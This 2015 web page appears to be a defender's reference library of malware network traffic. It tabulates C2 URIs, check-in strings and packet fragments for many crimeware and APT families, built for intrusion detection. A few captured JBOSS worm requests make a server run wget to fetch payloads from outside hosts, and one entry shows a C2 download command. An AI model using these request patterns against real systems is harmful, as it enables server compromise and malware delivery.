Library of Malware Traffic Patterns

Update February 2015 
Use the new link below for a new interface and updates.

Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize  malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don’t have access to a well designed and constantly updated malware database. This started as “personal notes” spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.

Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the “dl” column in the full spreadsheet table and corresponding links to the download location. Use “Contagio” password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun

VIEW OR DOWNLOAD “MALWARE TRAFFIC PATTERNS”

 List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)

type family method uri
CRIME Carberb / /Glupteba GET /get_ads.php?yy=1&aid=2&atr=exts&src=199
/go/p1011105.subexts
/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
/javascript/live_cd/popunder_script-1400195675.js
/images/ffadult/css/header.css
/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css
CRIME Fiesta EK GET /?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G
&QPy3i=J4HP58S7h&dRPS8=7bi7Y
/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c
/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5
/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2
CRIME Fiesta EK GET /yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94
/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54
CRIME Gongdad / Gong Da compromised site redirects GET /pg/kcp/index.html
/popup/index.html
/my/by4.html
CRIME Gongdad / Gong Da EK GET /data/file/cr/index.html
/data/file/cr/swfobject.js
/data/file/cr/jquery-1.4.2.min.js
/data/file/cr/main.html
/data/file/cr/AyVpSf.jar
/data/file/cr/com.class
/data/file/cr/edu.class
/data/file/cr/net.class
/data/file/cr/org.class /windos.exe
CRIME Dalexis Loader GET /tmp/pack.tar.gz
/assets/pack.tar.gz
/piwigotest/pack.tar.gz
/histoiredesarts/pack.tar.gz
/fit/pack.tar.gz
APT Gholee / Rocket Kitten GET / POST /index.php?c=Ud7atknq&r=17117d
/index.php?c=Ud7atknq&r=1710b2
CRIME Zemot GET /b/shoe
CRIME Zemot DL via Asprox GET /catalog/159
CRIME Zemot downloading Rovnix GET /mod_jshopping_products_gdle/mod_smartslider2/
CRIME Zemot downloading Rerdom GET /mod_jshoppi/soft32.dl
CRIME Rerdom GET /b/eve/
CRIME Clickfraud GET /b/req/
CRIME Cidox / Rerdom / Clickfraud GET /b/eve/e91425775cc5d7e657bd2cc7
/b/letr/21D84379F768D95442B92BC5
/b/opt/E1805AD5D79824076249D696
/b/req/FDD953BA382388758DF27AE4
/b/pkg/
CRIME Cidox / Rerdom / Clickfraud – clickurl GET GET /x/48petqwk9//AA/0
CRIME Cidox / Rerdom / Clickfraud – clickurl GET GET /2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com
APT / CRIME Scieron / Httneilc / HTClient packet data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
0040 00 12 00 63 01 00
CRIME Zollard RFI POST /cgi-bin/php? %2D%64+%……%2D%6E
CRIME Upatre GET /js/jquery-1.41.15.js
/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
/js/jquery-1.41.15.js?get_message=3290013886
CRIME Cryptowall 3.0 POST http://proxy1-1-1.i2p/fee4roy2hih9
http://payto4gtpn5czl2.torforall.com/ofs20c
CRIME Andromeda POST /ldr.php
CRIME Angler EK Chain GET /t19jl0hvv2.php
CRIME Angler EK Chain GET /752s2n0ndw.php
CRIME Angler EK Chain GET /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp
CRIME Angler EK Chain GET /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN
CRIME Angler EK Chain GET /models/runway/ring/header.js
CRIME Angler EK Chain GET /code/decrease/revenue/core.js
CRIME Asprox / Kuluoz GET /include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=
HTTPS over port 443 as a possible connectivity check
CRIME Asprox / Kuluoz POST /index.php
CRIME Chanitor POST /gate.php
CRIME Chanitor Downloads GET /wp-includes/js/tinymce/plugins/wpfullscreen/1.php
/wp-includes/js/tinymce/skins/lightgray/1.php
/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php
/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
CRIME Cryptowall POST /532boskc3i0
/nvebi4m4ggdokz
/wbkljtzpimbryt
CRIME Cryptowall GET /wp-content/themes/exiportal/dh5x3a1815j
/wp-content/themes/esther/6l7de
CRIME Dridex payload GET /mopsi/popsi.php
/js/bin.exe
CRIME Fake AV post compromise GET /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn
CRIME Fiesta EK GET /txf9p_v8/ye1PlchZ7X9pFcl0o-y3
/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287
/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406
CRIME Flashpack EK GET /sv62a76d18537/index.php
CRIME GameThief POST /tj.asp
CRIME GameThief GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
CRIME Gypothy GET /bigbight/kinkong.txt
CRIME H-W0rm POST /SpCoderHere
CRIME KaiXin EK GET /indexindex/
/indexindex/gg.jpg
/indexindex/jquery-1.4.2.min.js
/indexindex/swfobject.js
/indexindex/main.html
/xzz1.exe
/indexindex/NlNwQh.jar
/indexindex/com.class
/indexindex/edu.class
/indexindex/net.class
/indexindex/org.class
CRIME Kovter POST /9/form.php
/11/form.php
/w1/form.php
/1/feed.php
CRIME Nuclear EK GET / POST /XhBWV0gBT08OVFVW.html
/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA
/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j
CRIME Poweliks GET /query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
CRIME Redirect to Fiesta EK GET /?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &
m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3
CRIME Sweet Orange EK GET /admin4_account/mobile/movies.php?timeline=18
/bad/generic/help.php?state=39
/cnet/tmp/Indy_admin/investor.php?setup=20
/dbadmin/wp-admin/hex/help.php?state=33
/forums/example/screens/investor.php?setup=20
/gcc/tmp/bad/help.php?state=25
/ip/ch/investor.php?setup=20
/profiles/stat/movies.php?timeline=21
CRIME Sweet Orange EK GET /printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064
/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair
/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix
/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil
/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954
/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315
CRIME TBD POST /store/
CRIME TBD Post Flashpack GET /r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
/search?q=wrestling&subid=4699
/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
CRIME TBD Proxy (Htbot?) GET /ocfg.php?command=getip
/ocfg.php?command=getid
/ocfg.php?command=ghl&id=1493496
/ocfg.php?command=dl&id=1493496
/ocfg.php?command=version&id=1493496
/ocfg.php?command=getbackconnect
/pointer.php?proxy=%3A24635&secret=BER5w4evtjszw4MBRW
CRIME Upatre GET /1501us22//0/51-SP3/0/
/1501us22//1/0/0/
/2807cw//1/0/0/
/2807cw//41/5/4/
/2807cw//0/51-SP2/0/
/1201uk1//1201uk1//0/51-SP3/0/
/1201uk1//1/0/0/
/1201uk1//41/7/4/ “
/2307stat//0/51Service%20Pack%202/0/
/2307stat//1/0/0/
/2307stat//41/5/4/
CRIME Vavtrak / Neverquest POST /collection/0000004E/00/9EBD6132
CRIME Zeus GET /backup/config.bi
n
/en/images/config.bin
/guardnow/config.bin
/guardnow/config.bin
CRIME Zeus POST /choosen/helps/file.php
CRIME AdWare Kraddare.IL GET /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP… ..@RwNPRwNN::
CRIME AdWare Kraddare.IL POST /bv/config.php
CRIME Dyre GET /2001uk11/HOME/1/0/0/
CRIME Dyre GET /mandoc/eula012.pdf
CRIME Dyre GET /mandoc/ml1from1.tar
CRIME Dyre plugin dl GET /ineede900.rar
CRIME Kazy GET /cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR
CRIME Mudrop GET /gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=
CRIME ChePro (Brazil.banker) GET /ini/xvwmmwb.mod
CRIME Cryptolocker POST /home/
CRIME Reedum 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APT Vidgrab POST (172.16.253.130)|1067|WinXP|D|L|No| 0..0….1..52..|No|V2010-v24|2184|0|3111947|0|1|.
APT Page / stscout / Elise / lStudio / Wumins GET /29af9cdc/page_12082223.html
CRIME Tijcont GET /s/blog_b2afd7fe01019tkf.htm
APT Darkcomet GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA==
CRIME Kelihos GET /index.htm
CRIME Kuluoz Run command from C2 n c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e
APT njRAT / Backdoor.LV lv|’|’|TndfQzQyNjRFQkI=|’|’|VICTIM|’|’| Examiner|’|’|2013-06-21|’|’|USA|’|’| Win XP ProfessionalSP2 …

171.ll|’|’|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|’|’|SENTA|’|’| sentai55|’|’|15-01-29|’|’||’|’| Win 8.1SP0 x64|’|’|Yes|’|’|0.7d| ‘|’|..|’|’||’|’|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|’|’|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.

251.ll|’|’|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|’|’|SENTA|’|’|sentai55|’|’|15-01-29|’|’||’|’|Win 8.1SP0 x64|’|’|Yes|’|’|0.7d|’|’|..|’|’|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|’|’|b88ece4c04f706c9717bbe6fbda49ed2,

lv|’|’|VHJvamFuX0M0NkY2RTk= |’|’|MARK|’|’|user |’|’|2013-11-22|’|’||’|’|Win XP|’|’|No|’|’|0.6.4|’|’|..|’|’||’|’|[endof]

CRIME Chimerka.1 / Refyes.A POST /sys.php
CRIME Sality GET /images/logos.gif?1f5428=8212640
CRIME Nitedrem GET /down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393
CRIME Nitedrem GET /upx/kod.txt?k=123&t=7215
CRIME Nitedrem GET ……………2817324n-79s4-43q8-8n2n-676s3qr1ops5:……………
CRIME Nitedrem GET /config.txt?&t=4593
CRIME Nitedrem GET /fish.jpg?&t=4426
CRIME Sality GET /?12da89=12355930
CRIME Sality GET /images/logos.gif?114bbc=9068000
CRIME Sality GET /setting.doc
CRIME Torpig /Sinowal miniloader GET /
CRIME Torpig /Sinowal miniloader GET /search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0
CRIME EK Popads GET /?7d456d68729292e9843cb9dde2d2f7b4=34
CRIME EK Popads GET /4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf
CRIME EK Popads GET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar
CRIME EK Popads GET /?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
CRIME EK Popads GET /39ff9ff8c3b603d8eed017df64dd2799.eot
CRIME Alina POS v5.6 POST /duck/push.php
CRIME Alina POS v5.6 POST /adobe/version_check.php
CRIME Alina POS v6.0 POST /adobe/version_check.php
APT (IN) Hanove / Tourist POST /kamp.php
APT Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
APT Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
APT Surtr Initial GET 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
APT Taleret GET /
APT Taleret GET /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-
CRIME Sweet Orange EK GET /in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA==
CRIME ArcomRat / Dokstormac POST S_0001[!^]NEW
[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]
CRIME Ardamax keylogger SMTP 220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
CRIME Matsnu – MBR wiping ransomware POST /f44/myse.php
CRIME Mutopy Downloader GET /d/conh11.jpg
CRIME Mutopy Downloader initial callback GET /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4
CRIME Symmi Remote File Injector GET /img/seek.cgi?lin=100&db=dfs
/ae1.php
/ggu.php
/wp-content/gallery/28-juli-sundsore/options.php [wordpress url – varies
CRIME Matsnu – MBR wiping ransomware GET /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP
CRIME Adware Hotbar POST /vic.aspx?ver=4.0.1158.0&rnd=595937
CRIME Blackhole v2 GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622
CRIME USteal.D 220———- Welcome to Pure-FTPd ———-
APT Hangover Smackdown Minapro GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2
CRIME Cutwail / Pushdo POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe
APT Mediana Proxy GET /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0
CRIME Zeus POST /orders2010.php
/busted.php
CRIME Gypthoy POST /opt/mainpage.php
APT Hupigon / Graybird ………………………………….;… Windows XP 5.1 (2600.Service Pack 3)…………………….. ………………………………..$…DELLXT……………………………… ……………………………… ……………………………………. 4s.love…….HACK..
APT Variant Letsgo / TabMsgSQL downloader (comment crew) GET /index.htm
APT Tapaoux GET /ol/yahoo/banner4.php?jpg=../yahoo
CRIME Horst Proxy GET /socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0
CRIME PassAlert GET /loader/bin/file1.exe
CRIME Bitcoinminer POST /
CRIME Karagany Loader GET /user/go.php?html=do
APT Gh0st Gh0st….d…x.Kc“….@……L@:8..,39U! 1
APT IXESHE GET /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA
APT2 KoreanBanker DL GET /web/down/kbs.exe
APT Plugx SSL – see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png
CRIME PowerLoader POST /postnuke/blog.php
APT RssFeeder (moved from TBD tab, common name still unknown) 2nd stage POST /orange/news.php
APT RssFeeder (moved from TBD tab, common name still unknown) initialGET POST /data/rss
APT Swami GET /im/linux.php
CRIME GameThief GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16
CRIME Beebone downloader GET /0/?f|-1813912965Admin
/a/76876332/1
CRIME Neutrino EK var POST /cxiqocvbqd
APT Comfoo / Vinself / Mspub POST /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/
APT Destory Rat / Sogu / Thoper POST /update?id=000f72b8
APT2 Disttrack / Shamoon GET /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203
CRIME Avatar Rootkit GET /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance
APT 9002 POST 9002………………wx….9002………………wx….9002…………………..
APT MSWab /Yayih POST /bbs/info.asp
CRIME ZeroAccess / Sirefef GET /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25
/count.php?page=952000&style=LED_g&nbdigits=9
CRIME ZeroAccess / Sirefef ppc fraud – redirect GET HTTP/1.1 302 Moved Temporarily
APT 9002 POST /2d
CRIME Asprox / Kuluoz gets list of C2s GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0
CRIME Asprox / Kuluoz Checkin GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF
CRIME Asprox / Kuluoz GETs spam template

GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82
CRIME Carberb POST /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm
CRIME FakeAV var (via Kuluoz – Asprox botnet) GET /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F
APT Favorites GET /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE
APT Favorites GET /search?qu=
APT Favorites GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE
APT Favorites GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
APT Favorites POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH
APT Favorites POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE
APT Gh0st GET /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]
APT Gh0st var GET /h.gif?pid =113&v=130586214568 HTTP/ 1. 1
CRIME Guntior – CN bootkit GET /yx/tongji.html
CRIME Kuluoz.B downloader GET /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0
CRIME Ranbyus / Triton (Spy, Banking, smart cards) POST /releases/index.php
CRIME Urausy (Ransomware) GET /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php
APT Glasses GET /ewpindex.htm
APT IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT POST /index000000001.asp
APT LURK GET LURK0……..x.kf.e.apgpbpa0c..#……..
APT DNSWatch / Protux GET /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve
APT DNSWatch / Protux GET /news.jpg
APT DNSWatch / Protux POST /PHqgHumeay5705.mp3
CRIME Andromeda POST /new/gate.php
CRIME Citadel POST /g.php
CRIME Citadel (Zbot var) POST /C270suqdh/file.php
CRIME Pony loader POST /ponyb/gate.php HTTP/1.0
CRIME Reedum GET 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APT APT1 WEBC2_RAVE GET /comp/sem/resources.htm
APT backdoor ? GET /18110123/page_32262 308.html
APT Banechant 1 GET /IGKKT
APT Banechant payload dl 2 GET /adserv/logo.jpg HTTP /1.1
APT Beebus GET /windosdate/v6/default.aspx?ln=en-us
APT Beebus C2 checkin GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APT Beebus C2 checkin GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APT Beebus data send POST /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2
CRIME EK Blackhole 2 GET /fded177fe12651bb038f3f11b01c4168/q.php
APT Cookies /Cookiebag / Dalbot GET /1799.asp
APT Cookies /Cookiebag / Dalbot GET /3961.html
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=
APT Cookies /Cookiebag / Dalbot GET /8223.asp (also can be like /2007.asp,/2013.asp etc
APT Cookies /Cookiebag / Dalbot GET /indexs.zip
APT Coswid GET /old/google.png
APT CVE-2012-0754 SWF in DOC GET /test.mp4
APT CVE-2012-0779 GET /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000
CRIME Darkmegi GET /20111230.jpg
CRIME Darkness DDos v8g GET /index.php?uid=587609&ver=8g%20XP
APT Depyot GET /new/3d/d/pdf.php?id=2
APT Destory Rat / Sogu / Thoper POST /update?id=000f6b50
APT Destory Rat / Sogu / Thoper POST /update?id=3109c2a2
APT Destory Rat / Sogu / Thoper POST /update?product=windows
CRIME DirtJumper DDoS POST /678/index.php
CRIME Dirtjumper ddos POST /boi854tr4w.php
CRIME DNSChanger POST /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWT
I0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg==
APT Downloader BMP GET /images/evil.bmp
APT Einstein GET /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs
APT Einstein data send POST /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK
CRIME EK EK – Blackhole 2 landing GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd
CRIME EK EK Blackhole 1 GET /showthread.php?t=d7ad916d1c0396ff
CRIME EK EK Phoenix GET /navigator/jueoaritjuir.php
APT Enfal / Lurid GET /oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d
APT Enfal / Lurid GET /trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite
APT Enfal / Lurid POST /cgi-bin/CMS_SubitAll.cgi
APT Enfal / Lurid POST /cgl-bin/Owpq4.cgi
APT Enfal / Lurid POST /Sjwpc/odw3ux
CRIME Flashback OSX GET /statistics.html
APT Foxy POST /404error.asp
APT Foxy Checkin GET /images/leftnav_prog_bg.jpg
APT Gh0st ASP ver GET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr….)IL{..&y192.168.0.69
APT Gh0st PHP ver GET /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l
APT Gh0st v2000 var n v2010……..f……………(
……Service Pack 2..?..|…|…|0.@..
APT GoogleAdC2 GET /html/lost.html
APT GoogleAdC2 2nd stage GET /Trojan2.jpg
APT Googles GET /sll/monica.jpg
APT Greencat GET //
APT Gtalk GET /facebook.png
Hacktivism HOIC DDoS GET / HTTP/1.0
CRIME Imaut GET /setting.doc
CRIME IRCbot GET /check_ver.php?version=1.09
APT IXESHE GET /AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/
wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A
APT IXESHE AES GET /AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=
+LLQhpkZ9LOhGbgqvJghHci7M
CRIME JBOSS worm GET /zecmd/zecmd.jsp?comment=perl+lindb.pl
CRIME JBOSS worm GET /idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz
CRIME JBOSS worm GET /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz
APT Letsgo / TabMsgSQL GET /indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc
ode%20=%20’IXLCGIXELZ’
APT Letsgo / TabMsgSQL GET /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20
from%20tab_message%20where%20toid%20= %20’198’%20order%20by%20id%20asc
APT Letsgo / TabMsgSQL GET /safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20
(mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20
(‘0′,’victim’,’192.168.1.12′,’145.42.112.19′, ‘2011-06-08%2013:45:54’,
‘2011-06-08%2013:45:54′,’NMQVPTXFBH’)
APT Letsgo / TabMsgSQL downloader GET /new/iistart.html
APT Likseput GET /index.html
APT Lingbo (?) POST /windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM
>QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb
APT Luckycat – WIMMIE POST /count/count.php?m=c&n=[HOSTNAME]_
CRIME Medfos GET /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww==
APT MiniASP GET /device_asp?device_t=&key=&device_id=&cv=
